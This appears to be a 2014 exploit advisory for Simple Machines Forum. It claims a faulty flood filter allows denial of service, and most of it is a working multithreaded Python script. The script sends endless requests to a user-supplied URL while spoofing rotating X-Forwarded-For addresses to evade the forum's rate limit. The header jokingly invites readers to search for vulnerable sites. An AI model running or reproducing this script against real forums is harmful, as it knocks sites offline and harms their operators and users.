SMF allows for a denial of service condition due to a faulty filter.
a17c1fc2d75d13b9b2542fff763dfc53947c4fb73ba1599019190380ddc685ab
# Exploit Title: SMF Incorrect Flood Filter Headers# Date: 21/08/2014#
Author: Daniel Godoy# Author Mail:
DanielGodoy[at]GobiernoFederal[dot]com# Author Web:
www.delincuentedigital.com.ar# Software: Simple Machine Forum #
http://www.simplemachines.org# Tested on: Linux# DORK: Try yourself ;)
* #!/usr/bin/python
* # RemoteExecution
* #Autor: Daniel Godoy A.K.A hielasangre
*
* import sys, threading, time, urllib2,re
* print "Ingrese URL: "
* url = raw_input()
* a = b = c = d = 1
* count = 0
* class SMFPwner(threading.Thread):
* def __init__(self, num):
* threading.Thread.__init__(self)
* self.num = num
* def run(self):
* while 1:
* global a,b,c,d,count, url
* data = ""
* while 1:
* while 1:
* if d!=250:
* d+=1
* else:
* if c!= 250:
* c+=2
* d=0
* else:
* if b!=250:
* c=0
* d=0
* b+=1
* else:
* a+=1
* b=0
* c=0
* d=0
*
head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d)
* headers = { 'X-Forwarded-For' : head }
*
req = urllib2.Request(url, data, headers)
* f = urllib2.urlopen(req)
* count += 1
* print "[ Visitando => " + url + " Por
" + str(count) +" vez ]"
* for i in range(3):
* ta = SMFPwner(i)
* ta.start()
http://pastebin.com/TiZc0T05
-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com